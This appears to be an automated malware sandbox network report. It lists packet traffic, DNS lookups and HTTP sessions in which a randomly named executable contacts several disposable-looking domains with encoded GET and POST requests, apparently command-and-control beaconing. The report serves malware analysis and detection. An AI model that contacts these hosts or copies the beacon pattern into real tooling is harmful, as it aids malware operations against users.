                                                                  Dec 12, 2024 21:38:42.526638031 CET4971980192.168.2.818.139.62.226
                                                                  Dec 12, 2024 21:38:42.648552895 CET804971918.139.62.226192.168.2.8
                                                                  Dec 12, 2024 21:38:42.648657084 CET4971980192.168.2.818.139.62.226
                                                                  Dec 12, 2024 21:38:42.772784948 CET4971980192.168.2.818.139.62.226
                                                                  Dec 12, 2024 21:38:42.892705917 CET804971918.139.62.226192.168.2.8
                                                                  Dec 12, 2024 21:38:44.284528017 CET4971980192.168.2.818.139.62.226
                                                                  Dec 12, 2024 21:38:44.289469004 CET804971918.139.62.226192.168.2.8
                                                                  Dec 12, 2024 21:38:44.289484978 CET804971918.139.62.226192.168.2.8
                                                                  Dec 12, 2024 21:38:44.289526939 CET4971980192.168.2.818.139.62.226
                                                                  Dec 12, 2024 21:38:44.289557934 CET4971980192.168.2.818.139.62.226
                                                                  Dec 12, 2024 21:38:44.405498028 CET804971918.139.62.226192.168.2.8
                                                                  Dec 12, 2024 21:38:44.405608892 CET4971980192.168.2.818.139.62.226
                                                                  Dec 12, 2024 21:38:45.311338902 CET4972080192.168.2.818.139.62.226
                                                                  Dec 12, 2024 21:38:45.433155060 CET804972018.139.62.226192.168.2.8
                                                                  Dec 12, 2024 21:38:45.433228016 CET4972080192.168.2.818.139.62.226
                                                                  Dec 12, 2024 21:38:45.451946974 CET4972080192.168.2.818.139.62.226
                                                                  Dec 12, 2024 21:38:45.572417974 CET804972018.139.62.226192.168.2.8
                                                                  Dec 12, 2024 21:38:46.956482887 CET4972080192.168.2.818.139.62.226
                                                                  Dec 12, 2024 21:38:47.046320915 CET804972018.139.62.226192.168.2.8
                                                                  Dec 12, 2024 21:38:47.046386003 CET4972080192.168.2.818.139.62.226
                                                                  Dec 12, 2024 21:38:47.046619892 CET804972018.139.62.226192.168.2.8
                                                                  Dec 12, 2024 21:38:47.046664953 CET4972080192.168.2.818.139.62.226
                                                                  Dec 12, 2024 21:38:47.076724052 CET804972018.139.62.226192.168.2.8
                                                                  Dec 12, 2024 21:38:47.076811075 CET4972080192.168.2.818.139.62.226
                                                                  Dec 12, 2024 21:38:47.975272894 CET4972180192.168.2.818.139.62.226
                                                                  Dec 12, 2024 21:38:48.095321894 CET804972118.139.62.226192.168.2.8
                                                                  Dec 12, 2024 21:38:48.095402002 CET4972180192.168.2.818.139.62.226
                                                                  Dec 12, 2024 21:38:48.111126900 CET4972180192.168.2.818.139.62.226
                                                                  Dec 12, 2024 21:38:48.232703924 CET804972118.139.62.226192.168.2.8
                                                                  Dec 12, 2024 21:38:48.232805014 CET804972118.139.62.226192.168.2.8
                                                                  Dec 12, 2024 21:38:49.641750097 CET4972180192.168.2.818.139.62.226
                                                                  Dec 12, 2024 21:38:49.687383890 CET804972118.139.62.226192.168.2.8
                                                                  Dec 12, 2024 21:38:49.687414885 CET804972118.139.62.226192.168.2.8
                                                                  Dec 12, 2024 21:38:49.687458038 CET4972180192.168.2.818.139.62.226
                                                                  Dec 12, 2024 21:38:49.687506914 CET4972180192.168.2.818.139.62.226
                                                                  Dec 12, 2024 21:38:49.762780905 CET804972118.139.62.226192.168.2.8
                                                                  Dec 12, 2024 21:38:49.762831926 CET4972180192.168.2.818.139.62.226
                                                                  Dec 12, 2024 21:38:50.647145987 CET4972280192.168.2.818.139.62.226
                                                                  Dec 12, 2024 21:38:50.767117023 CET804972218.139.62.226192.168.2.8
                                                                  Dec 12, 2024 21:38:50.767225981 CET4972280192.168.2.818.139.62.226
                                                                  Dec 12, 2024 21:38:50.776324034 CET4972280192.168.2.818.139.62.226
                                                                  Dec 12, 2024 21:38:50.896343946 CET804972218.139.62.226192.168.2.8
                                                                  Dec 12, 2024 21:38:52.356918097 CET804972218.139.62.226192.168.2.8
                                                                  Dec 12, 2024 21:38:52.357086897 CET804972218.139.62.226192.168.2.8
                                                                  Dec 12, 2024 21:38:52.357197046 CET4972280192.168.2.818.139.62.226
                                                                  Dec 12, 2024 21:38:52.362210035 CET4972280192.168.2.818.139.62.226
                                                                  Dec 12, 2024 21:38:52.482420921 CET804972218.139.62.226192.168.2.8
                                                                  Dec 12, 2024 21:39:06.045407057 CET4972380192.168.2.8209.74.77.107
                                                                  Dec 12, 2024 21:39:06.166357994 CET8049723209.74.77.107192.168.2.8
                                                                  Dec 12, 2024 21:39:06.166508913 CET4972380192.168.2.8209.74.77.107
                                                                  Dec 12, 2024 21:39:06.182305098 CET4972380192.168.2.8209.74.77.107
                                                                  Dec 12, 2024 21:39:06.302587986 CET8049723209.74.77.107192.168.2.8
                                                                  Dec 12, 2024 21:39:07.390558004 CET8049723209.74.77.107192.168.2.8
                                                                  Dec 12, 2024 21:39:07.390573978 CET8049723209.74.77.107192.168.2.8
                                                                  Dec 12, 2024 21:39:07.390753984 CET4972380192.168.2.8209.74.77.107
                                                                  Dec 12, 2024 21:39:07.690902948 CET4972380192.168.2.8209.74.77.107
                                                                  Dec 12, 2024 21:39:08.709920883 CET4972480192.168.2.8209.74.77.107
                                                                  Dec 12, 2024 21:39:08.830482960 CET8049724209.74.77.107192.168.2.8
                                                                  Dec 12, 2024 21:39:08.830760002 CET4972480192.168.2.8209.74.77.107
                                                                  Dec 12, 2024 21:39:08.845956087 CET4972480192.168.2.8209.74.77.107
                                                                  Dec 12, 2024 21:39:08.968632936 CET8049724209.74.77.107192.168.2.8
                                                                  Dec 12, 2024 21:39:10.051693916 CET8049724209.74.77.107192.168.2.8
                                                                  Dec 12, 2024 21:39:10.051911116 CET8049724209.74.77.107192.168.2.8
                                                                  Dec 12, 2024 21:39:10.051964998 CET4972480192.168.2.8209.74.77.107
                                                                  Dec 12, 2024 21:39:10.347093105 CET4972480192.168.2.8209.74.77.107
                                                                  Dec 12, 2024 21:39:11.365843058 CET4972580192.168.2.8209.74.77.107
                                                                  Dec 12, 2024 21:39:11.485641003 CET8049725209.74.77.107192.168.2.8
                                                                  Dec 12, 2024 21:39:11.485740900 CET4972580192.168.2.8209.74.77.107
                                                                  Dec 12, 2024 21:39:11.500159979 CET4972580192.168.2.8209.74.77.107
                                                                  Dec 12, 2024 21:39:11.619911909 CET8049725209.74.77.107192.168.2.8
                                                                  Dec 12, 2024 21:39:11.619962931 CET8049725209.74.77.107192.168.2.8
                                                                  Dec 12, 2024 21:39:12.784013033 CET8049725209.74.77.107192.168.2.8
                                                                  Dec 12, 2024 21:39:12.784102917 CET8049725209.74.77.107192.168.2.8
                                                                  Dec 12, 2024 21:39:12.784153938 CET4972580192.168.2.8209.74.77.107
                                                                  Dec 12, 2024 21:39:13.004282951 CET4972580192.168.2.8209.74.77.107
                                                                  Dec 12, 2024 21:39:14.021894932 CET4972680192.168.2.8209.74.77.107
                                                                  Dec 12, 2024 21:39:14.141761065 CET8049726209.74.77.107192.168.2.8
                                                                  Dec 12, 2024 21:39:14.141882896 CET4972680192.168.2.8209.74.77.107
                                                                  Dec 12, 2024 21:39:14.150553942 CET4972680192.168.2.8209.74.77.107
                                                                  Dec 12, 2024 21:39:14.270266056 CET8049726209.74.77.107192.168.2.8
                                                                  Dec 12, 2024 21:39:15.387685061 CET8049726209.74.77.107192.168.2.8
                                                                  Dec 12, 2024 21:39:15.387711048 CET8049726209.74.77.107192.168.2.8
                                                                  Dec 12, 2024 21:39:15.387860060 CET4972680192.168.2.8209.74.77.107
                                                                  Dec 12, 2024 21:39:15.391508102 CET4972680192.168.2.8209.74.77.107
                                                                  Dec 12, 2024 21:39:15.511440992 CET8049726209.74.77.107192.168.2.8
                                                                  Dec 12, 2024 21:39:21.067605972 CET4972780192.168.2.8154.205.159.116
                                                                  Dec 12, 2024 21:39:21.187483072 CET8049727154.205.159.116192.168.2.8
                                                                  Dec 12, 2024 21:39:21.187581062 CET4972780192.168.2.8154.205.159.116
                                                                  Dec 12, 2024 21:39:21.202306032 CET4972780192.168.2.8154.205.159.116
                                                                  Dec 12, 2024 21:39:21.322148085 CET8049727154.205.159.116192.168.2.8
                                                                  Dec 12, 2024 21:39:22.706759930 CET4972780192.168.2.8154.205.159.116
                                                                  Dec 12, 2024 21:39:22.821970940 CET8049727154.205.159.116192.168.2.8
                                                                  Dec 12, 2024 21:39:22.821994066 CET8049727154.205.159.116192.168.2.8
                                                                  Dec 12, 2024 21:39:22.822042942 CET4972780192.168.2.8154.205.159.116
                                                                  Dec 12, 2024 21:39:22.822089911 CET4972780192.168.2.8154.205.159.116
                                                                  Dec 12, 2024 21:39:22.826731920 CET8049727154.205.159.116192.168.2.8
                                                                  Dec 12, 2024 21:39:22.826790094 CET4972780192.168.2.8154.205.159.116
                                                                  Dec 12, 2024 21:39:23.727250099 CET4972880192.168.2.8154.205.159.116
                                                                  Dec 12, 2024 21:39:23.847045898 CET8049728154.205.159.116192.168.2.8
                                                                  Dec 12, 2024 21:39:23.847418070 CET4972880192.168.2.8154.205.159.116
                                                                  Dec 12, 2024 21:39:23.862206936 CET4972880192.168.2.8154.205.159.116
                                                                  Dec 12, 2024 21:39:23.982131958 CET8049728154.205.159.116192.168.2.8
                                                                  Dec 12, 2024 21:39:25.378329992 CET4972880192.168.2.8154.205.159.116
                                                                  Dec 12, 2024 21:39:25.493190050 CET8049728154.205.159.116192.168.2.8
                                                                  Dec 12, 2024 21:39:25.493288994 CET8049728154.205.159.116192.168.2.8
                                                                  Dec 12, 2024 21:39:25.493294954 CET4972880192.168.2.8154.205.159.116
                                                                  Dec 12, 2024 21:39:25.493339062 CET4972880192.168.2.8154.205.159.116
                                                                  Dec 12, 2024 21:39:25.498476028 CET8049728154.205.159.116192.168.2.8
                                                                  Dec 12, 2024 21:39:25.499908924 CET4972880192.168.2.8154.205.159.116
                                                                  Dec 12, 2024 21:39:26.397162914 CET4972980192.168.2.8154.205.159.116
                                                                  Dec 12, 2024 21:39:26.517057896 CET8049729154.205.159.116192.168.2.8
                                                                  Dec 12, 2024 21:39:26.519706011 CET4972980192.168.2.8154.205.159.116
                                                                  Dec 12, 2024 21:39:26.534866095 CET4972980192.168.2.8154.205.159.116
                                                                  Dec 12, 2024 21:39:26.654772043 CET8049729154.205.159.116192.168.2.8
                                                                  Dec 12, 2024 21:39:26.654788017 CET8049729154.205.159.116192.168.2.8
                                                                  Dec 12, 2024 21:39:28.050477982 CET4972980192.168.2.8154.205.159.116
                                                                  Dec 12, 2024 21:39:28.171380043 CET8049729154.205.159.116192.168.2.8
                                                                  Dec 12, 2024 21:39:28.171564102 CET4972980192.168.2.8154.205.159.116
                                                                  Dec 12, 2024 21:39:29.069993019 CET4973080192.168.2.8154.205.159.116
                                                                  Dec 12, 2024 21:39:29.190129042 CET8049730154.205.159.116192.168.2.8
                                                                  Dec 12, 2024 21:39:29.190213919 CET4973080192.168.2.8154.205.159.116
                                                                  Dec 12, 2024 21:39:29.202048063 CET4973080192.168.2.8154.205.159.116
                                                                  Dec 12, 2024 21:39:29.322118044 CET8049730154.205.159.116192.168.2.8
                                                                  Dec 12, 2024 21:39:30.889329910 CET8049730154.205.159.116192.168.2.8
                                                                  Dec 12, 2024 21:39:30.889410019 CET8049730154.205.159.116192.168.2.8
                                                                  Dec 12, 2024 21:39:30.889518023 CET4973080192.168.2.8154.205.159.116
                                                                  Dec 12, 2024 21:39:30.893296957 CET4973080192.168.2.8154.205.159.116
                                                                  Dec 12, 2024 21:39:31.013088942 CET8049730154.205.159.116192.168.2.8
                                                                  Dec 12, 2024 21:39:36.410422087 CET4973180192.168.2.83.33.130.190
                                                                  Dec 12, 2024 21:39:36.530265093 CET80497313.33.130.190192.168.2.8
                                                                  Dec 12, 2024 21:39:36.530386925 CET4973180192.168.2.83.33.130.190
                                                                  Dec 12, 2024 21:39:36.545583010 CET4973180192.168.2.83.33.130.190
                                                                  Dec 12, 2024 21:39:36.665420055 CET80497313.33.130.190192.168.2.8
                                                                  Dec 12, 2024 21:39:37.625699997 CET80497313.33.130.190192.168.2.8
                                                                  Dec 12, 2024 21:39:37.625772953 CET80497313.33.130.190192.168.2.8
                                                                  Dec 12, 2024 21:39:37.625828981 CET4973180192.168.2.83.33.130.190
                                                                  Dec 12, 2024 21:39:38.050250053 CET4973180192.168.2.83.33.130.190
                                                                  Dec 12, 2024 21:39:39.068898916 CET4973280192.168.2.83.33.130.190
                                                                  Dec 12, 2024 21:39:39.188808918 CET80497323.33.130.190192.168.2.8
                                                                  Dec 12, 2024 21:39:39.188904047 CET4973280192.168.2.83.33.130.190
                                                                  Dec 12, 2024 21:39:39.208513975 CET4973280192.168.2.83.33.130.190
                                                                  Dec 12, 2024 21:39:39.328284979 CET80497323.33.130.190192.168.2.8
                                                                  Dec 12, 2024 21:39:40.722439051 CET4973280192.168.2.83.33.130.190
                                                                  Dec 12, 2024 21:39:40.842690945 CET80497323.33.130.190192.168.2.8
                                                                  Dec 12, 2024 21:39:40.845046043 CET4973280192.168.2.83.33.130.190
                                                                  Dec 12, 2024 21:39:41.751569986 CET4973380192.168.2.83.33.130.190
                                                                  Dec 12, 2024 21:39:41.871711016 CET80497333.33.130.190192.168.2.8
                                                                  Dec 12, 2024 21:39:41.871855974 CET4973380192.168.2.83.33.130.190
                                                                  Dec 12, 2024 21:39:41.898597956 CET4973380192.168.2.83.33.130.190
                                                                  Dec 12, 2024 21:39:42.018532038 CET80497333.33.130.190192.168.2.8
                                                                  Dec 12, 2024 21:39:42.018567085 CET80497333.33.130.190192.168.2.8
                                                                  Dec 12, 2024 21:39:42.967243910 CET80497333.33.130.190192.168.2.8
                                                                  Dec 12, 2024 21:39:42.967418909 CET80497333.33.130.190192.168.2.8
                                                                  Dec 12, 2024 21:39:42.967530966 CET4973380192.168.2.83.33.130.190
                                                                  Dec 12, 2024 21:39:43.409624100 CET4973380192.168.2.83.33.130.190
                                                                  Dec 12, 2024 21:39:44.428863049 CET4973480192.168.2.83.33.130.190
                                                                  Dec 12, 2024 21:39:44.548918962 CET80497343.33.130.190192.168.2.8
                                                                  Dec 12, 2024 21:39:44.549067974 CET4973480192.168.2.83.33.130.190
                                                                  Dec 12, 2024 21:39:44.560446978 CET4973480192.168.2.83.33.130.190
                                                                  Dec 12, 2024 21:39:44.680367947 CET80497343.33.130.190192.168.2.8
                                                                  Dec 12, 2024 21:39:45.713291883 CET80497343.33.130.190192.168.2.8
                                                                  Dec 12, 2024 21:39:45.713412046 CET80497343.33.130.190192.168.2.8
                                                                  Dec 12, 2024 21:39:45.713531971 CET4973480192.168.2.83.33.130.190
                                                                  Dec 12, 2024 21:39:45.716208935 CET4973480192.168.2.83.33.130.190
                                                                  Dec 12, 2024 21:39:45.836061954 CET80497343.33.130.190192.168.2.8

                                                                  UDP Packets

                                                                  TimestampSource PortDest PortSource IPDest IP
                                                                  Dec 12, 2024 21:38:08.423593998 CET5137253192.168.2.81.1.1.1
                                                                  Dec 12, 2024 21:38:09.035815954 CET53513721.1.1.1192.168.2.8
                                                                  Dec 12, 2024 21:38:25.522785902 CET6170053192.168.2.81.1.1.1
                                                                  Dec 12, 2024 21:38:26.518989086 CET6170053192.168.2.81.1.1.1
                                                                  Dec 12, 2024 21:38:26.615339041 CET53617001.1.1.1192.168.2.8
                                                                  Dec 12, 2024 21:38:26.656785965 CET53617001.1.1.1192.168.2.8
                                                                  Dec 12, 2024 21:38:41.381788015 CET6465753192.168.2.81.1.1.1
                                                                  Dec 12, 2024 21:38:42.394042969 CET6465753192.168.2.81.1.1.1
                                                                  Dec 12, 2024 21:38:42.519774914 CET53646571.1.1.1192.168.2.8
                                                                  Dec 12, 2024 21:38:42.531562090 CET53646571.1.1.1192.168.2.8
                                                                  Dec 12, 2024 21:38:57.366195917 CET5862653192.168.2.81.1.1.1
                                                                  Dec 12, 2024 21:38:57.588110924 CET53586261.1.1.1192.168.2.8
                                                                  Dec 12, 2024 21:39:05.647577047 CET5441953192.168.2.81.1.1.1
                                                                  Dec 12, 2024 21:39:06.042658091 CET53544191.1.1.1192.168.2.8
                                                                  Dec 12, 2024 21:39:20.397300005 CET5550253192.168.2.81.1.1.1
                                                                  Dec 12, 2024 21:39:21.064862967 CET53555021.1.1.1192.168.2.8
                                                                  Dec 12, 2024 21:39:35.899326086 CET5557153192.168.2.81.1.1.1
                                                                  Dec 12, 2024 21:39:36.407892942 CET53555711.1.1.1192.168.2.8
                                                                  Dec 12, 2024 21:39:50.726933956 CET5984353192.168.2.81.1.1.1
                                                                  Dec 12, 2024 21:39:51.738131046 CET5984353192.168.2.81.1.1.1
                                                                  Dec 12, 2024 21:39:52.224288940 CET53598431.1.1.1192.168.2.8
                                                                  Dec 12, 2024 21:39:52.224373102 CET53598431.1.1.1192.168.2.8

                                                                  DNS Queries

                                                                  TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                  Dec 12, 2024 21:38:08.423593998 CET192.168.2.81.1.1.10xdee3Standard query (0)www.070001325.xyzA (IP address)IN (0x0001)false
                                                                  Dec 12, 2024 21:38:25.522785902 CET192.168.2.81.1.1.10x6e65Standard query (0)www.expancz.topA (IP address)IN (0x0001)false
                                                                  Dec 12, 2024 21:38:26.518989086 CET192.168.2.81.1.1.10x6e65Standard query (0)www.expancz.topA (IP address)IN (0x0001)false
                                                                  Dec 12, 2024 21:38:41.381788015 CET192.168.2.81.1.1.10xf750Standard query (0)www.taxiquynhonnew.clickA (IP address)IN (0x0001)false
                                                                  Dec 12, 2024 21:38:42.394042969 CET192.168.2.81.1.1.10xf750Standard query (0)www.taxiquynhonnew.clickA (IP address)IN (0x0001)false
                                                                  Dec 12, 2024 21:38:57.366195917 CET192.168.2.81.1.1.10x2046Standard query (0)www.epitomize.shopA (IP address)IN (0x0001)false
                                                                  Dec 12, 2024 21:39:05.647577047 CET192.168.2.81.1.1.10xc5bStandard query (0)www.learnwithus.siteA (IP address)IN (0x0001)false
                                                                  Dec 12, 2024 21:39:20.397300005 CET192.168.2.81.1.1.10x7da1Standard query (0)www.jijievo.siteA (IP address)IN (0x0001)false
                                                                  Dec 12, 2024 21:39:35.899326086 CET192.168.2.81.1.1.10x268Standard query (0)www.likesharecomment.netA (IP address)IN (0x0001)false
                                                                  Dec 12, 2024 21:39:50.726933956 CET192.168.2.81.1.1.10xfe90Standard query (0)www.397256.pinkA (IP address)IN (0x0001)false
                                                                  Dec 12, 2024 21:39:51.738131046 CET192.168.2.81.1.1.10xfe90Standard query (0)www.397256.pinkA (IP address)IN (0x0001)false

                                                                  DNS Answers

                                                                  TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                  Dec 12, 2024 21:38:09.035815954 CET1.1.1.1192.168.2.80xdee3No error (0)www.070001325.xyz161.97.142.144A (IP address)IN (0x0001)false
                                                                  Dec 12, 2024 21:38:26.615339041 CET1.1.1.1192.168.2.80x6e65No error (0)www.expancz.top107.155.56.30A (IP address)IN (0x0001)false
                                                                  Dec 12, 2024 21:38:26.656785965 CET1.1.1.1192.168.2.80x6e65No error (0)www.expancz.top107.155.56.30A (IP address)IN (0x0001)false
                                                                  Dec 12, 2024 21:38:42.519774914 CET1.1.1.1192.168.2.80xf750No error (0)www.taxiquynhonnew.clickdns.ladipage.comCNAME (Canonical name)IN (0x0001)false
                                                                  Dec 12, 2024 21:38:42.519774914 CET1.1.1.1192.168.2.80xf750No error (0)dns.ladipage.com18.139.62.226A (IP address)IN (0x0001)false
                                                                  Dec 12, 2024 21:38:42.519774914 CET1.1.1.1192.168.2.80xf750No error (0)dns.ladipage.com13.228.81.39A (IP address)IN (0x0001)false
                                                                  Dec 12, 2024 21:38:42.519774914 CET1.1.1.1192.168.2.80xf750No error (0)dns.ladipage.com54.179.173.60A (IP address)IN (0x0001)false
                                                                  Dec 12, 2024 21:38:42.531562090 CET1.1.1.1192.168.2.80xf750No error (0)www.taxiquynhonnew.clickdns.ladipage.comCNAME (Canonical name)IN (0x0001)false
                                                                  Dec 12, 2024 21:38:42.531562090 CET1.1.1.1192.168.2.80xf750No error (0)dns.ladipage.com54.179.173.60A (IP address)IN (0x0001)false
                                                                  Dec 12, 2024 21:38:42.531562090 CET1.1.1.1192.168.2.80xf750No error (0)dns.ladipage.com18.139.62.226A (IP address)IN (0x0001)false
                                                                  Dec 12, 2024 21:38:42.531562090 CET1.1.1.1192.168.2.80xf750No error (0)dns.ladipage.com13.228.81.39A (IP address)IN (0x0001)false
                                                                  Dec 12, 2024 21:38:57.588110924 CET1.1.1.1192.168.2.80x2046Name error (3)www.epitomize.shopnonenoneA (IP address)IN (0x0001)false
                                                                  Dec 12, 2024 21:39:06.042658091 CET1.1.1.1192.168.2.80xc5bNo error (0)www.learnwithus.site209.74.77.107A (IP address)IN (0x0001)false
                                                                  Dec 12, 2024 21:39:21.064862967 CET1.1.1.1192.168.2.80x7da1No error (0)www.jijievo.siteall.wjscdn.comCNAME (Canonical name)IN (0x0001)false
                                                                  Dec 12, 2024 21:39:21.064862967 CET1.1.1.1192.168.2.80x7da1No error (0)all.wjscdn.com154.205.159.116A (IP address)IN (0x0001)false
                                                                  Dec 12, 2024 21:39:21.064862967 CET1.1.1.1192.168.2.80x7da1No error (0)all.wjscdn.com38.54.112.227A (IP address)IN (0x0001)false
                                                                  Dec 12, 2024 21:39:21.064862967 CET1.1.1.1192.168.2.80x7da1No error (0)all.wjscdn.com154.90.35.240A (IP address)IN (0x0001)false
                                                                  Dec 12, 2024 21:39:21.064862967 CET1.1.1.1192.168.2.80x7da1No error (0)all.wjscdn.com154.90.58.209A (IP address)IN (0x0001)false
                                                                  Dec 12, 2024 21:39:21.064862967 CET1.1.1.1192.168.2.80x7da1No error (0)all.wjscdn.com154.205.143.51A (IP address)IN (0x0001)false
                                                                  Dec 12, 2024 21:39:21.064862967 CET1.1.1.1192.168.2.80x7da1No error (0)all.wjscdn.com154.205.156.26A (IP address)IN (0x0001)false
                                                                  Dec 12, 2024 21:39:36.407892942 CET1.1.1.1192.168.2.80x268No error (0)www.likesharecomment.netlikesharecomment.netCNAME (Canonical name)IN (0x0001)false
                                                                  Dec 12, 2024 21:39:36.407892942 CET1.1.1.1192.168.2.80x268No error (0)likesharecomment.net3.33.130.190A (IP address)IN (0x0001)false
                                                                  Dec 12, 2024 21:39:36.407892942 CET1.1.1.1192.168.2.80x268No error (0)likesharecomment.net15.197.148.33A (IP address)IN (0x0001)false
                                                                  Dec 12, 2024 21:39:52.224288940 CET1.1.1.1192.168.2.80xfe90No error (0)www.397256.pink38.46.13.54A (IP address)IN (0x0001)false
                                                                  Dec 12, 2024 21:39:52.224373102 CET1.1.1.1192.168.2.80xfe90No error (0)www.397256.pink38.46.13.54A (IP address)IN (0x0001)false

                                                                  HTTP Request Dependency Graph

                                                                  • www.070001325.xyz
                                                                  • www.expancz.top
                                                                  • www.taxiquynhonnew.click
                                                                  • www.learnwithus.site
                                                                  • www.jijievo.site
                                                                  • www.likesharecomment.net

                                                                  HTTP Packets

                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                  0192.168.2.849714161.97.142.144805240C:\Program Files (x86)\mFcuZnbhgXdemrXcBnUPFhsumXtyIJrpCtNGIfFsGFULpnbNNjwgjyZOXqPERImEnscPjlDbvuZ\PcwrDoOfOMD.exe
                                                                  TimestampBytes transferredDirectionData
                                                                  Dec 12, 2024 21:38:09.183099031 CET562OUTGET /gebt/?Y6Bh=0jQHfl_Xbv0D_JU&84EhVDY=vv4Z5oAEVW8Fnw5+v3rC78A1apnlABoa7eW6m5kMXrJjwDKHwLvNIdd6hCLbwWC7cjqqbjXxYb26MUHQV2edtQopE4JYmWV0aJQG1y+cvjoSBHDa4aEMRetXqM1fOkggqQ== HTTP/1.1
                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                  Accept-Language: en-US,en;q=0.9
                                                                  Host: www.070001325.xyz
                                                                  Connection: close
                                                                  User-Agent: Mozilla/5.0 (Linux; Android 5.1; XT1055 Build/LPA23.12-21-1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
                                                                  Dec 12, 2024 21:38:10.418154001 CET1236INHTTP/1.1 404 Not Found
                                                                  Server: nginx
                                                                  Date: Thu, 12 Dec 2024 20:38:10 GMT
                                                                  Content-Type: text/html; charset=utf-8
                                                                  Content-Length: 2966
                                                                  Connection: close
                                                                  Vary: Accept-Encoding
                                                                  ETag: "66cce1df-b96"
                                                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 09 3c 68 65 61 64 3e 0a 09 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 20 2f 3e 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 20 2f 3e 0a 09 09 3c 74 69 74 6c 65 3e 50 61 67 65 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 09 09 3c 73 74 79 6c 65 3e 0a 09 09 09 62 6f 64 79 20 7b 0a 09 09 09 09 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 35 66 35 66 35 3b 0a 09 09 09 09 6d 61 72 67 69 6e 2d 74 6f 70 3a 20 38 25 3b 0a 09 09 09 09 63 6f 6c 6f 72 3a 20 23 35 64 35 64 35 64 3b 0a 09 09 09 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 2d 61 70 70 6c 65 2d 73 79 73 74 65 6d 2c 20 42 6c 69 6e 6b 4d 61 63 53 79 73 74 65 6d 46 6f 6e 74 2c 20 22 53 65 67 6f 65 20 55 49 22 2c 20 52 6f 62 6f 74 6f 2c 20 22 48 [TRUNCATED]
                                                                  Data Ascii: <!DOCTYPE html><html lang="en"><head><meta charset="utf-8" /><meta name="viewport" content="width=device-width, initial-scale=1" /><title>Page Not Found</title><style>body {background-color: #f5f5f5;margin-top: 8%;color: #5d5d5d;font-family: -apple-system, BlinkMacSystemFont, "Segoe UI", Roboto, "Helvetica Neue", Arial,"Noto Sans", sans-serif, "Apple Color Emoji", "Segoe UI Emoji", "Segoe UI Symbol","Noto Color Emoji";text-shadow: 0px 1px 1px rgba(255, 255, 255, 0.75);text-align: center;}h1 {font-size: 2.45em;font-weight: 700;color: #5d5d5d;letter-spacing: -0.02em;margin-bottom: 30px;margin-top: 30px;}.container {width: 100%;margin-right: auto;margin-left: auto;}.animate__animated {animation-duration: 1s;animation-fill-mode: both;}.animate__fadeIn {animation-name: fadeIn;}.info {color: #5594cf;fill: #5594cf;}.error [TRUNCATED]
                                                                  Dec 12, 2024 21:38:10.418684006 CET1236INData Raw: 3b 0a 09 09 09 09 66 69 6c 6c 3a 20 23 63 39 32 31 32 37 3b 0a 09 09 09 7d 0a 0a 09 09 09 2e 77 61 72 6e 69 6e 67 20 7b 0a 09 09 09 09 63 6f 6c 6f 72 3a 20 23 66 66 63 63 33 33 3b 0a 09 09 09 09 66 69 6c 6c 3a 20 23 66 66 63 63 33 33 3b 0a 09 09
                                                                  Data Ascii: ;fill: #c92127;}.warning {color: #ffcc33;fill: #ffcc33;}.success {color: #5aba47;fill: #5aba47;}.icon-large {height: 132px;width: 132px;}.description-text {color: #707
                                                                  Dec 12, 2024 21:38:10.418700933 CET698INData Raw: 39 34 31 20 32 31 36 20 32 39 36 76 34 63 30 20 36 2e 36 32 37 20 35 2e 33 37 33 20 31 32 20 31 32 20 31 32 68 35 36 63 36 2e 36 32 37 20 30 20 31 32 2d 35 2e 33 37 33 20 31 32 2d 31 32 76 2d 31 2e 33 33 33 63 30 2d 32 38 2e 34 36 32 20 38 33 2e
                                                                  Data Ascii: 941 216 296v4c0 6.627 5.373 12 12 12h56c6.627 0 12-5.373 12-12v-1.333c0-28.462 83.186-29.647 83.186-106.667 0-58.002-60.165-102-116.531-102zM256 338c-25.365 0-46 20.635-46 46 0 25.364 20.635 46 46 46s46-20.636 46-46c0-25.365-20.635-46-46-46z"


                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                  1192.168.2.849715107.155.56.30805240C:\Program Files (x86)\mFcuZnbhgXdemrXcBnUPFhsumXtyIJrpCtNGIfFsGFULpnbNNjwgjyZOXqPERImEnscPjlDbvuZ\PcwrDoOfOMD.exe
                                                                  TimestampBytes transferredDirectionData
                                                                  Dec 12, 2024 21:38:26.753129005 CET810OUTPOST /2gcl/ HTTP/1.1
                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                  Accept-Language: en-US,en;q=0.9
                                                                  Accept-Encoding: gzip, deflate, br
                                                                  Host: www.expancz.top
                                                                  Origin: http://www.expancz.top
                                                                  Connection: close
                                                                  Content-Type: application/x-www-form-urlencoded
                                                                  Content-Length: 208
                                                                  Cache-Control: max-age=0
                                                                  Referer: http://www.expancz.top/2gcl/
                                                                  User-Agent: Mozilla/5.0 (Linux; Android 5.1; XT1055 Build/LPA23.12-21-1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
